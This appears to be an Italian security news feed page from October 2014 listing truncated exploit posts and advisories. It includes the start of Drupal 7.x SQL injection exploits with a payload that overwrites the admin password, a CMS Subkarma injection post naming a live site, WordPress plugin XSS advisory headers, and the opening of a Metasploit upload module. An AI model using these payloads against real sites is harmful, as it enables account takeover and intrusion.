Drupal Core 7.32 SQL Injection (python Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
  ...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (PHP Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'"...

Leggi il seguito »

Drupal 7.X SQL Injection

17 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal...

Leggi il seguito »

WordPress MaxButtons 1.26.0 Cross Site Scripting

16 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: October 2, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress WP Google Maps 6.0.26 Cross Site Scripting

16 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps 
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: September 29, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

CMS Subkarma Cross Site Scripting / SQL Injection

14 ottobre 2014 - Fonte: http://www.mondounix.com
# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3...

Leggi il seguito »

WordPress EWWW Image Optimizer 2.0.1 Cross Site Scripting

10 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23234
Product: EWWW Image Optimizer WordPress plugin
Vendor: Shane Bishop
Vulnerable Version(s): 2.0.1 and probably prior
Tested Version: 2.0.1
Advisory Publication:  September 17, 2014  [without technical details]
Vendor Notification: September 17, 2014 
Vendor Patch: September 24, 2014 
Public Disclosure: October 8, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-6243
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress Contact Form DB 2.8.13 Cross Site Scripting

10 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23233
Product: Contact Form DB WordPress plugin
Vendor: Michael Simpson
Vulnerable Version(s): 2.8.13 and probably prior
Tested Version: 2.8.13
Advisory Publication:  September 17, 2014  [without technical details]
Vendor Notification: September 17, 2014 
Vendor Patch: September 25, 2014 
Public Disclosure: October 8, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7139
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress Google Calendar Events 2.0.1 Cross Site Scripting

10 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23235
Product: Google Calendar Events WordPress plugin
Vendor: Phil Derksen
Vulnerable Version(s): 2.0.1 and probably prior
Tested Version: 2.0.1
Advisory Publication:  September 17, 2014  [without technical details]
Vendor Notification: September 17, 2014 
Vendor Patch: October 7, 2014 
Public Disclosure: October 8, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7138
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress InfusionSoft Upload

9 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
    ...

Leggi il seguito »